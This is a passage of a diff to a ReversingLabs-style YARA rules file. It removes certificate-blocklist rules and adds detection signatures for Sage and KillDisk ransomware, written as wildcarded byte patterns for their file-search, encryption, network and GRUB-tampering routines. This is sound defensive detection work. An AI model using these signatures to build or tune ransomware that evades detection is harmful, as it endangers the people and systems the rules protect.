+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 50 8D 4D ?? 51 53 53 6A ?? 53 8B
+            1D ?? ?? ?? ?? 52 89 45 ?? FF D3 85 C0 74 ?? 8B 45 ?? 8B 3D ?? ?? ?? ?? 50 6A ?? FF
+            D7 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 8B 55 ?? 8B 02 51 50 56 E8 ?? ??
+            ?? ?? 8B 4D ?? 8B 45 ?? 83 C4 ?? 51 8D 55 ?? 52 56 6A ?? 6A ?? 6A ?? 50 FF D3 85 C0
+            74 ?? 8B 5D ?? 8B 0B 51 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 89 10 89
+            33 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 DB 8B 55 ?? 52 FF
+            15 ?? ?? ?? ?? 8B 45 ?? 53 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 56 68 ?? ?? ?? ??
+            6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B F0
+            56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 56 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 50 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 8D B5 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B
+            00 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 B5 ?? ?? ?? ??
+            72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ??
+            ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B 95 ?? ?? ?? ?? 6A ?? 8D
+            8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 52 51 50 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "joaweb" and pe.signatures [ i ] . serial == "7d:82:4b:a1:f7:f7:30:31:9c:50:d6:4c:9a:7e:d5:07" and 1238025599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_77A64759F12766E363D779998C71Bdc9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sage : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sage ransomware."
 		author = "ReversingLabs"
-		id = "98acd01b-c452-530d-8814-2591810ecd53"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "81f4c666-93f9-51bb-8dda-431ef7a81b74"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2320-L2336"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2bf3d99ddec6b76da1ca60a9285767a5b34b84455db58195fc5d8fd8a22c9f8a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Sage.yara#L1-L77"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "69079b7176050096cdbaaaff30dd0359366b3a6a74e8bc17db348794388f71ba"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sage"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Gigabit Times Technology Co., Ltd" and pe.signatures [ i ] . serial == "77:a6:47:59:f1:27:66:e3:63:d7:79:99:8c:71:bd:c9" and 1301011199 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0B0D17Ec1449B4B2D38Fcb0F20Fbcd3A : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4484b00d-8fad-5f8f-9030-67216f2820a3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2338-L2354"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3121f2c49d0d4c396023924521f2c980045b6f07d082e49447429e9cd640e0ef"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection = {
+            83 EC ?? 8B 44 24 ?? 53 55 56 57 8B 7C 24 ?? 8B 77 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ??
+            8B D8 51 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 77 ?? FF 15 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84
+            ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 56 53 55 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 85 DB 0F
+            84 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 BA ?? ?? ?? ?? 66 3B F2 0F 95 C0 48 25 ?? ?? ?? ??
+            50 6A ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8B FF
+            8D 54 24 ?? 52 56 FF D3 8D 44 24 ?? 50 8B 44 24 ?? 50 50 57 E8 ?? ?? ?? ?? 83 C4 ??
+            50 56 FF D5 85 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 6A ?? 8D 4C 24 ?? 51 8D 54
+            24 ?? 52 6A ?? 68 ?? ?? ?? ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 56 FF 15 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 44 24 ?? 5F 5E 5D 5B 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 04 24 83
+            C4 ?? C3 57 E8 ?? ?? ?? ?? 83 C4
+        }
+		$encrypt_files = {
+            83 EC ?? 53 8B 1D ?? ?? ?? ?? 55 8B 6C 24 ?? 56 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 7D ?? 57 FF D3 8B F0 83 FE ?? 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ??
+            ?? 89 44 24 ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
+            4C 24 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 FF D3 8B D8 83 FB ?? 75 ??
+            56 FF 15 ?? ?? ?? ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 54 24 ?? 6A ?? 52 57
+            56 53 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 35 ?? ?? ?? ?? 8B E8 FF D6 53 FF D6 85 ED 79 ??
+            8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C5 5D 5B 83 C4 ?? C3 57 E8 ?? ?? ?? ?? 8B
+            F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8B D8 FF 15 ?? ?? ?? ?? 8B 4C 24 ??
+            6A ?? 53 51 EB ?? 8B 4C 24 ?? BA ?? ?? ?? ?? 3B 55 ?? 1B C0 83 C0 ?? 50 51 57 56 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D8 FF 15 ?? ?? ?? ?? 85 DB 79 ?? 5F 5E 5D 8B C3 5B 83
+            C4 ?? C3 57 E8 ?? ?? ?? ?? 8B F0 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B
+            D8 53 57 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5D 33
+            C0 5B 83 C4 ?? C3
+        }
+		$find_files = {
+            53 55 8B 2D ?? ?? ?? ?? 56 57 33 FF 57 57 FF D5 8B F0 85 F6 74 ?? 85 FF 74 ?? 57 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 44 36 ?? 50 6A ?? 8B DE E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 57 56
+            FF D5 8B F0 3B DE 72 ?? 66 83 3F ?? 8B DF 0F 84 ?? ?? ?? ?? 8B 6C 24 ?? 53 8B FB FF
+            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8D 5C 43 ?? FF D6 85 C0 74 ?? 68
+            ?? ?? ?? ?? 57 FF D6 85 C0 74 ?? 57 FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 D3 E2 F6
+            C2 ?? 74 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 6A ?? 89 06 8D 46 ??
+            6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 51 C7 46 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8D 56 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 55 89 46 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 66 83 3B ?? 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WEBPIC DESENVOLVIMENTO DE SOFTWARE LTDA" and pe.signatures [ i ] . serial == "0b:0d:17:ec:14:49:b4:b2:d3:8f:cb:0f:20:fb:cd:3a" and 1394150399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Fe9404Dc73Cf1C2Ba1450B8398305557 : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects KillDisk ransomware."
 		author = "ReversingLabs"
-		id = "17700719-81ea-58d4-87f5-4d5c1b19bf64"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "af6652dd-c668-5ae1-b51b-e272cb440c20"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2356-L2374"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c0132d71de1384f6e534dd154eba88c4a51c43b7dfe984f3064ba4feffa4dd5a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Linux.Ransomware.KillDisk.yara#L1-L144"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3ed1fb2b7b24cd4d5100d93ed53a9ab28e1482bd0998a0538d8710a962ee839f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "KillDisk"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8E\\xA6\\xE9\\x97\\xA8\\xE7\\xBF\\x94\\xE9\\x80\\x9A\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE5\\x88\\x86\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" or pe.signatures [ i ] . serial == "fe:94:04:dc:73:cf:1c:2b:a1:45:0b:83:98:30:55:57" ) and 1287360000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1Cb2D523A6Bf7A066642C578De1C9Be4 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "d2c87c29-cb64-5d43-847b-64c888421c1f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2376-L2392"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5a786b9ade5a59b8a1e0bbef1eb3dcb65404dcee19d572dc60f9ec9f45e4755b"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
+            89 45 ?? 31 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
+            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 85 C0 79 ?? 48 8B
+            85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 78 ?? 48 8B 85 ?? ?? ?? ?? BE ??
+            ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ??
+            85 C0 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 90 ?? ?? ?? ?? 48 85 C0
+            48 0F 48 C2 48 C1 F8 ?? 48 89 85 ?? ?? ?? ?? 48 8B 45 ?? 48 85 C0 7E ?? 48 83 BD ??
+            ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48
+            83 BD ?? ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ??
+            ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C2 48 C1
+        }
+		$encrypt_files_2 = {
+            EA ?? 48 01 D0 48 D1 F8 48 C1 E0 ?? 48 89 C1 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89
+            CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ??
+            ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ??
+            ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 BA ??
+            ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48 C1 F8 ?? 48 89 C2 48 89 C8 48
+            C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
+            85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 89 C7 E8
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75
+            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 48 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ??
+            48 8B 8D ?? ?? ?? ?? 48 BA ?? ?? ?? ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 8D 04 0A 48
+            C1 F8 ?? 48 89 C2 48 89 C8 48 C1 F8 ?? 48 29 C2 48 89 D0 89 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? C1 E0 ?? 48 63 C8 8B 85 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 89 CE 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? 83 85 ??
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7C ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ??
+            ?? ?? ?? 8B 05 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 48 8B 75 ?? 64 48 33
+            34 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$search_files = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
+            89 45 ?? 31 C0 8B 05 ?? ?? ?? ?? 83 C0 ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 F8
+            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ??
+            ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ??
+            E9 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0
+            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 75 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 85 C0 74 ?? 48 8B 85 ?? ?? ?? ?? 48 83 C0 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 85 C0 75 ?? 83 85 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
+            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 C7 C1 ?? ?? ?? ?? 48 89 C2 B8 ??
+            ?? ?? ?? 48 89 D7 F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 01 D0
+            66 C7 00 ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8D
+            85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 83 E8 ?? 89 05 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ??
+            ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$subvert_grub_1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
+            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ??
+            ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ??
+            ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85
+            ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
+            ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ??
+            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8
+        }
+		$subvert_grub_2 = {
+            48 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 B8 ?? ?? ??
+            ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ??
+            ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ??
+            ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48
+            8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
